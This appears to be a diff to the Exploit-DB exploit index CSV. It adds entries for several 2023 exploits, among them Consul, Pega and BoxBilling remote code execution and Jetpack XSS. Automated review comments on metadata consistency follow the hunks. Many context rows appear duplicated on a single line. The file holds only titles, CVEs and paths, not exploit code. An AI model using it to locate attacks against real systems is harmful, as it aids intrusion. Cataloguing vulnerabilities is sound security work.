51112,exploits/jsp/webapps/51112.txt,"ZKTeco ZEM/ZMM 8.88 - Missing Authentication",2023-03-28,"RedTeam Pentesting GmbH",webapps,jsp,,2023-03-28,2023-03-28,0,CVE-2022-42953,,,,,
40328,exploits/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,webapps,jsp,8088,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php 40328,exploits/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,webapps,jsp,8088,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php
40327,exploits/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass",2016-08-31,LiquidWorm,webapps,jsp,,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php 40327,exploits/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass",2016-08-31,LiquidWorm,webapps,jsp,,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php
40325,exploits/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin)",2016-08-31,LiquidWorm,webapps,jsp,8088,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php 40325,exploits/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin)",2016-08-31,LiquidWorm,webapps,jsp,8088,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php
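Review bot: the 51112 ZKTeco ZEM/ZMM row is filed as platform "jsp" because it sorts next to the ZKTeco ZKAccess and ZKBioSecurity web suites, but "ZEM/ZMM 8.88" reads like a device firmware designation rather than a JSP web application; if the advisory covers terminal firmware, the hardware platform used for the Tapo C310 row elsewhere in this change is the better fit. Unrelated to this change but visible in the context, the two 46967 rows above it share one id and file and differ only in the tag, an existing duplicate worth a separate fix.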
@ -10732,6 +10735,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22139,exploits/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin - Remote Format String",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6577/info 22139,exploits/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin - Remote Format String",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6577/info
22138,exploits/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6575/info 22138,exploits/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6575/info
22140,exploits/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6578/info 22140,exploits/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6578/info
51117,exploits/multiple/remote/51117.txt,"Hashicorp Consul v1.0 - Remote Command Execution (RCE)",2023-03-28,GatoGamer1155,remote,multiple,,2023-03-28,2023-03-28,0,,,,,,
35092,exploits/multiple/remote/35092.html,"Helix Server 14.0.1.571 - Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",remote,multiple,,2010-12-10,2014-10-28,1,,,,,,https://www.securityfocus.com/bid/45340/info 35092,exploits/multiple/remote/35092.html,"Helix Server 14.0.1.571 - Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",remote,multiple,,2010-12-10,2014-10-28,1,,,,,,https://www.securityfocus.com/bid/45340/info
23600,exploits/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 - Cross-Site Scripting",2004-01-26,"Donato Ferrante",remote,multiple,,2004-01-26,2016-09-06,1,CVE-2004-2113;OSVDB-3754,,,,,https://www.securityfocus.com/bid/9491/info 23600,exploits/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 - Cross-Site Scripting",2004-01-26,"Donato Ferrante",remote,multiple,,2004-01-26,2016-09-06,1,CVE-2004-2113;OSVDB-3754,,,,,https://www.securityfocus.com/bid/9491/info
48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple,,2020-06-10,2020-06-10,0,,,,,, 48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple,,2020-06-10,2020-06-10,0,,,,,,
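Review bot: the 51117 Consul row pins a single version in its title ("Hashicorp Consul v1.0") while the file expresses ranges explicitly where more than one release is affected ("Zimbra < 8.8.11", "PEGA Platform <= 7.2 ML0"); confirm whether v1.0 is the only affected release or merely the one tested and adjust the title accordingly. The port column is also empty although the PoC is a remote exploit against a network service; the 201 and 1292 rows in this hunk record 21 for FTP, so record the port the PoC connects to if it is fixed.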
@ -11384,6 +11388,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
201,exploits/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,remote,multiple,21,2000-11-20,2016-12-04,1,OSVDB-11805;CVE-2000-0573,,,,http://www.exploit-db.comwu-ftpd-2.6.0-2.src.rpm, 201,exploits/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,remote,multiple,21,2000-11-20,2016-12-04,1,OSVDB-11805;CVE-2000-0573,,,,http://www.exploit-db.comwu-ftpd-2.6.0-2.src.rpm,
9934,exploits/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,remote,multiple,,2009-07-09,2017-04-01,1,CVE-2009-0695;OSVDB-55839,"Metasploit Framework (MSF)",,,, 9934,exploits/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,remote,multiple,,2009-07-09,2017-04-01,1,CVE-2009-0695;OSVDB-55839,"Metasploit Framework (MSF)",,,,
1292,exploits/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",remote,multiple,21,2005-11-03,2018-01-18,1,OSVDB-19682;CVE-2005-3081,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwzdftpd-0.5.4.exe, 1292,exploits/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",remote,multiple,21,2005-11-03,2018-01-18,1,OSVDB-19682;CVE-2005-3081,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwzdftpd-0.5.4.exe,
51111,exploits/multiple/remote/51111.txt,"X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)",2023-03-28,"Hosein Vita",remote,multiple,,2023-03-28,2023-03-28,0,CVE-2022-38580,,,,,
25391,exploits/multiple/remote/25391.txt,"XAMPP - 'Phonebook.php' Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",remote,multiple,,2005-04-12,2013-05-13,1,CVE-2005-1077;OSVDB-15634,,,,,https://www.securityfocus.com/bid/13127/info 25391,exploits/multiple/remote/25391.txt,"XAMPP - 'Phonebook.php' Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",remote,multiple,,2005-04-12,2013-05-13,1,CVE-2005-1077;OSVDB-15634,,,,,https://www.securityfocus.com/bid/13127/info
33577,exploits/multiple/remote/33577.txt,"XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities",2009-06-10,MustLive,remote,multiple,,2009-06-10,2017-01-06,1,,,,,http://www.exploit-db.comxampp-win32-1.6.8.exe,https://www.securityfocus.com/bid/37997/info 33577,exploits/multiple/remote/33577.txt,"XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities",2009-06-10,MustLive,remote,multiple,,2009-06-10,2017-01-06,1,,,,,http://www.exploit-db.comxampp-win32-1.6.8.exe,https://www.securityfocus.com/bid/37997/info
38974,exploits/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot - Remote Code Execution (Metasploit)",2015-12-14,Metasploit,remote,multiple,,2015-12-14,2017-11-02,1,,"Metasploit Framework (MSF)",,,, 38974,exploits/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot - Remote Code Execution (Metasploit)",2015-12-14,Metasploit,remote,multiple,,2015-12-14,2017-11-02,1,,"Metasploit Framework (MSF)",,,,
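Review bot: the 51111 X-Skipper-Proxy row is typed "remote" with an empty tags column, whereas the other SSRF entry visible in this change, 46967 (Zimbra), is typed "webapps" and tagged "Server-Side Request Forgery (SSRF)". If "remote" is deliberate because the target is a proxy component rather than a web application, at least add the SSRF tag so both rows surface in a class search; otherwise align the type with 46967.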
@ -11882,6 +11887,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41928,exploits/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",webapps,multiple,,2017-04-25,2017-04-25,0,CVE-2017-7221,,,,, 41928,exploits/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",webapps,multiple,,2017-04-25,2017-04-25,0,CVE-2017-7221,,,,,
43002,exploits/multiple/webapps/43002.py,"OpenText Documentum Content Server - Privilege Escalation",2017-10-17,"Andrey B. Panfilov",webapps,multiple,,2017-10-17,2017-10-17,0,CVE-2017-15276,,,,, 43002,exploits/multiple/webapps/43002.py,"OpenText Documentum Content Server - Privilege Escalation",2017-10-17,"Andrey B. Panfilov",webapps,multiple,,2017-10-17,2017-10-17,0,CVE-2017-15276,,,,,
37271,exploits/multiple/webapps/37271.txt,"Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-06-12,"Dolev Farhi",webapps,multiple,80,2015-06-12,2015-06-12,0,CVE-2015-4420;OSVDB-123307;OSVDB-123306;OSVDB-123305,,,,, 37271,exploits/multiple/webapps/37271.txt,"Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-06-12,"Dolev Farhi",webapps,multiple,80,2015-06-12,2015-06-12,0,CVE-2015-4420;OSVDB-123307;OSVDB-123306;OSVDB-123305,,,,,
51113,exploits/multiple/webapps/51113.py,"OPSWAT Metadefender Core - Privilege Escalation",2023-03-28,"Ulascan Yildirim",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-32272,,,,,
49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple,,2021-01-20,2021-01-20,0,,,,,, 49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple,,2021-01-20,2021-01-20,0,,,,,,
10448,exploits/multiple/webapps/10448.txt,"Oracle E-Business Suite - Multiple Vulnerabilities",2009-12-14,Hacktics,webapps,multiple,,2009-12-13,,1,,,,,, 10448,exploits/multiple/webapps/10448.txt,"Oracle E-Business Suite - Multiple Vulnerabilities",2009-12-14,Hacktics,webapps,multiple,,2009-12-13,,1,,,,,,
50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",2021-07-29,"J. Francisco Bolivar",webapps,multiple,,2021-07-29,2021-07-29,0,,,,,, 50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",2021-07-29,"J. Francisco Bolivar",webapps,multiple,,2021-07-29,2021-07-29,0,,,,,,
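Review bot: the 51113 OPSWAT Metadefender Core row carries no version in its description, unlike every other new row in this change and the neighbouring 37271 "Opsview 4.6.2" row, and this CSV has no separate affected-version column. The PoC is a Python script, so the release it was written against should be known; put it in the title rather than relying on CVE-2022-32272 alone for readers scanning descriptions.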
@ -11908,6 +11914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt 35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,, 50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,,
51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,,
42335,exploits/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",webapps,multiple,,2017-07-18,2017-07-18,0,CVE-2017-11356;CVE-2017-11355,"Cross-Site Scripting (XSS)",,,, 42335,exploits/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",webapps,multiple,,2017-07-18,2017-07-18,0,CVE-2017-11356;CVE-2017-11355,"Cross-Site Scripting (XSS)",,,,
33284,exploits/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,webapps,multiple,,2009-10-14,2014-05-10,1,,,,,,https://www.securityfocus.com/bid/36672/info 33284,exploits/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,webapps,multiple,,2009-10-14,2014-05-10,1,,,,,,https://www.securityfocus.com/bid/36672/info
50097,exploits/multiple/webapps/50097.txt,"perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)",2021-07-06,"Alhasan Abbas",webapps,multiple,,2021-07-06,2021-07-06,0,,,,,, 50097,exploits/multiple/webapps/50097.txt,"perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)",2021-07-06,"Alhasan Abbas",webapps,multiple,,2021-07-06,2021-07-06,0,,,,,,
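Review bot: the new 51099 row spells the vendor "Pega Platform" while the existing 42335 row two lines below spells it "PEGA Platform"; since this file is sorted by description and searched by substring, a search for one spelling misses the other. Pick one form for both rows (editing 42335 in the same change is acceptable) so the two Pega entries sort and search together.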
@ -14458,6 +14465,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80,2017-12-09,2017-12-13,1,CVE-2017-17595,"SQL Injection (SQLi)",,,, 43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80,2017-12-09,2017-12-13,1,CVE-2017-17595,"SQL Injection (SQLi)",,,,
49580,exploits/php/webapps/49580.txt,"Beauty Parlour Management System 1.0 - 'sername' SQL Injection",2021-02-19,"Thinkland Security Team",webapps,php,,2021-02-19,2021-02-19,0,,,,,, 49580,exploits/php/webapps/49580.txt,"Beauty Parlour Management System 1.0 - 'sername' SQL Injection",2021-02-19,"Thinkland Security Team",webapps,php,,2021-02-19,2021-02-19,0,,,,,,
48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php,,2020-06-18,2020-06-18,0,,,,,, 48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php,,2020-06-18,2020-06-18,0,,,,,,
51098,exploits/php/webapps/51098.txt,"Beauty-salon v1.0 - Remote Code Execution (RCE)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
5170,exploits/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,webapps,php,,2008-02-20,,1,OSVDB-42010;CVE-2008-0921,,,,, 5170,exploits/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,webapps,php,,2008-02-20,,1,OSVDB-42010;CVE-2008-0921,,,,,
17179,exploits/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,webapps,php,,2011-04-16,2011-04-16,1,,,,,, 17179,exploits/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,webapps,php,,2011-04-16,2011-04-16,1,,,,,,
26609,exploits/php/webapps/26609.txt,"Bedeng PSP 1.1 - 'baca.php?ckode' SQL Injection",2005-11-28,r0t,webapps,php,,2005-11-28,2013-07-05,1,CVE-2005-3953;OSVDB-21174,,,,,https://www.securityfocus.com/bid/15583/info 26609,exploits/php/webapps/26609.txt,"Bedeng PSP 1.1 - 'baca.php?ckode' SQL Injection",2005-11-28,r0t,webapps,php,,2005-11-28,2013-07-05,1,CVE-2005-3953;OSVDB-21174,,,,,https://www.securityfocus.com/bid/15583/info
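Review bot: the 51098 Beauty-salon row has no CVE, no source URL and a handle for its author, which the file permits (49580 and 48605 above it are the same), but that leaves the hyphenated string "Beauty-salon v1.0" as the only handle on the product. Make sure the description reproduces the project's exact name and that 51098.txt records where the software was obtained, otherwise the entry cannot be tied back to a specific codebase.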
@ -14848,6 +14856,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12419,exploits/php/webapps/12419.txt,"Boutique SudBox 1.2 - Cross-Site Request Forgery (Changer Login et Mot de Passe)",2010-04-27,indoushka,webapps,php,,2010-04-26,,1,,,,,, 12419,exploits/php/webapps/12419.txt,"Boutique SudBox 1.2 - Cross-Site Request Forgery (Changer Login et Mot de Passe)",2010-04-27,indoushka,webapps,php,,2010-04-26,,1,,,,,,
26877,exploits/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,php,,2005-12-19,2013-07-16,1,CVE-2005-4375;OSVDB-21821,,,,,https://www.securityfocus.com/bid/15936/info 26877,exploits/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,php,,2005-12-19,2013-07-16,1,CVE-2005-4375;OSVDB-21821,,,,,https://www.securityfocus.com/bid/15936/info
30083,exploits/php/webapps/30083.txt,"BoxBilling 3.6.11 - 'mod_notification' Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,webapps,php,,2013-12-06,2013-12-06,0,OSVDB-100746,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5163.php 30083,exploits/php/webapps/30083.txt,"BoxBilling 3.6.11 - 'mod_notification' Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,webapps,php,,2013-12-06,2013-12-06,0,OSVDB-100746,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5163.php
51108,exploits/php/webapps/51108.txt,"BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)",2023-03-28,zetc0de,webapps,php,,2023-03-28,2023-03-28,0,CVE-2022-3552,,,,,
41084,exploits/php/webapps/41084.txt,"BoZoN 2.4 - Remote Code Execution",2017-01-17,hyp3rlinx,webapps,php,,2017-01-17,2017-01-17,0,,,,,http://www.exploit-db.comBoZoN-master.zip, 41084,exploits/php/webapps/41084.txt,"BoZoN 2.4 - Remote Code Execution",2017-01-17,hyp3rlinx,webapps,php,,2017-01-17,2017-01-17,0,,,,,http://www.exploit-db.comBoZoN-master.zip,
7930,exploits/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",webapps,php,,2009-01-29,,1,OSVDB-51725;OSVDB-51724,,,,, 7930,exploits/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",webapps,php,,2009-01-29,,1,OSVDB-51725;OSVDB-51724,,,,,
9838,exploits/php/webapps/9838.pl,"BPGames 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",webapps,php,,2009-09-21,,1,CVE-2009-3500;OSVDB-58297;OSVDB-58296,,,,, 9838,exploits/php/webapps/9838.pl,"BPGames 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",webapps,php,,2009-09-21,,1,CVE-2009-3500;OSVDB-58297;OSVDB-58296,,,,,
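Review bot: the 51108 description "BoxBilling<=4.22.1.5" omits the spaces around the operator that the rest of the file uses ("Zimbra < 8.8.11", "PEGA Platform <= 7.2 ML0", "P-Synch < 6.2.5"); write it "BoxBilling <= 4.22.1.5" so the product name remains a clean token for search and sorting and the row matches the existing 30083 BoxBilling entry's spelling.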
@ -19392,6 +19401,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30290,exploits/php/webapps/30290.txt,"IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",webapps,php,,2007-07-11,2013-12-15,1,,,,,,https://www.securityfocus.com/bid/24864/info 30290,exploits/php/webapps/30290.txt,"IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",webapps,php,,2007-07-11,2013-12-15,1,,,,,,https://www.securityfocus.com/bid/24864/info
37643,exploits/php/webapps/37643.txt,"IBM Rational ClearQuest 8.0 - Multiple Vulnerabilities",2012-08-27,anonymous,webapps,php,,2012-08-27,2016-12-18,1,CVE-2012-0744;OSVDB-84917,,,,,https://www.securityfocus.com/bid/55125/info 37643,exploits/php/webapps/37643.txt,"IBM Rational ClearQuest 8.0 - Multiple Vulnerabilities",2012-08-27,anonymous,webapps,php,,2012-08-27,2016-12-18,1,CVE-2012-0744;OSVDB-84917,,,,,https://www.securityfocus.com/bid/55125/info
32546,exploits/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,webapps,php,,2014-03-26,2014-03-26,0,CVE-2013-6719;OSVDB-104072;CVE-2013-6720,,,,, 32546,exploits/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,webapps,php,,2014-03-26,2014-03-26,0,CVE-2013-6719;OSVDB-104072;CVE-2013-6720,,,,,
51119,exploits/php/webapps/51119.txt,"iBooking v1.0.8 - Arbitrary File Upload",2023-03-28,d1z1n370/oPty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
13945,exploits/php/webapps/13945.txt,"iBoutique - 'page' SQL Injection / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",webapps,php,,2010-06-19,,1,OSVDB-76887;CVE-2010-5020;CVE-2010-0804;OSVDB-62681,,,,, 13945,exploits/php/webapps/13945.txt,"iBoutique - 'page' SQL Injection / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",webapps,php,,2010-06-19,,1,OSVDB-76887;CVE-2010-5020;CVE-2010-0804;OSVDB-62681,,,,,
6444,exploits/php/webapps/6444.txt,"iBoutique 4.0 - 'cat' SQL Injection",2008-09-12,r45c4l,webapps,php,,2008-09-11,2016-12-22,1,OSVDB-48127;CVE-2008-4354,,,,, 6444,exploits/php/webapps/6444.txt,"iBoutique 4.0 - 'cat' SQL Injection",2008-09-12,r45c4l,webapps,php,,2008-09-11,2016-12-22,1,OSVDB-48127;CVE-2008-4354,,,,,
19985,exploits/php/webapps/19985.txt,"iBoutique 4.0 - 'key' SQL Injection",2012-07-20,"SecPod Research",webapps,php,,2012-07-20,2016-12-22,0,OSVDB-84391,,,,,http://secpod.org/advisories/SecPod_NetArt_Media_iBoutique_SQLi_Vuln.txt 19985,exploits/php/webapps/19985.txt,"iBoutique 4.0 - 'key' SQL Injection",2012-07-20,"SecPod Research",webapps,php,,2012-07-20,2016-12-22,0,OSVDB-84391,,,,,http://secpod.org/advisories/SecPod_NetArt_Media_iBoutique_SQLi_Vuln.txt
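Review bot: the 51119 row's author field "d1z1n370/oPty" uses a slash where this file separates co-authors with an underscore (47589: "Fabian Mosch_ Nick Theisinger"). If these are two people, follow that convention so the author column parses the same way everywhere; if it is one handle, leave it but confirm with the submitter, since a slash in this column is otherwise unused in the visible rows.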
@ -20132,6 +20142,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30040,exploits/php/webapps/30040.txt,"Jetbox CMS 2.1 Email - 'FormMail.php' Input Validation",2007-05-15,"Jesper Jurcenoks",webapps,php,,2007-05-15,2013-12-05,1,CVE-2007-1898;OSVDB-34088,,,,,https://www.securityfocus.com/bid/23989/info 30040,exploits/php/webapps/30040.txt,"Jetbox CMS 2.1 Email - 'FormMail.php' Input Validation",2007-05-15,"Jesper Jurcenoks",webapps,php,,2007-05-15,2013-12-05,1,CVE-2007-1898;OSVDB-34088,,,,,https://www.securityfocus.com/bid/23989/info
6549,exploits/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,webapps,php,,2008-09-23,,1,OSVDB-51677;CVE-2008-5992;OSVDB-51676;OSVDB-48554;OSVDB-48553,,,,, 6549,exploits/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,webapps,php,,2008-09-23,,1,OSVDB-51677;CVE-2008-5992;OSVDB-51676;OSVDB-48554;OSVDB-48553,,,,,
6542,exploits/php/webapps/6542.txt,"JETIK-WEB Software - 'kat' SQL Injection",2008-09-23,d3v1l,webapps,php,,2008-09-22,2016-12-22,1,OSVDB-48518;CVE-2008-6401,,,,, 6542,exploits/php/webapps/6542.txt,"JETIK-WEB Software - 'kat' SQL Injection",2008-09-23,d3v1l,webapps,php,,2008-09-22,2016-12-22,1,OSVDB-48518;CVE-2008-6401,,,,,
51104,exploits/php/webapps/51104.txt,"Jetpack 11.4 - Cross Site Scripting (XSS)",2023-03-28,"Behrouz Mansoori",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
27619,exploits/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - 'detail.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24494,,,,,https://www.securityfocus.com/bid/17449/info 27619,exploits/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - 'detail.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24494,,,,,https://www.securityfocus.com/bid/17449/info
27617,exploits/php/webapps/27617.txt,"JetPhoto 1.0/2.0/2.1 - 'gallery.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24492,,,,,https://www.securityfocus.com/bid/17449/info 27617,exploits/php/webapps/27617.txt,"JetPhoto 1.0/2.0/2.1 - 'gallery.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24492,,,,,https://www.securityfocus.com/bid/17449/info
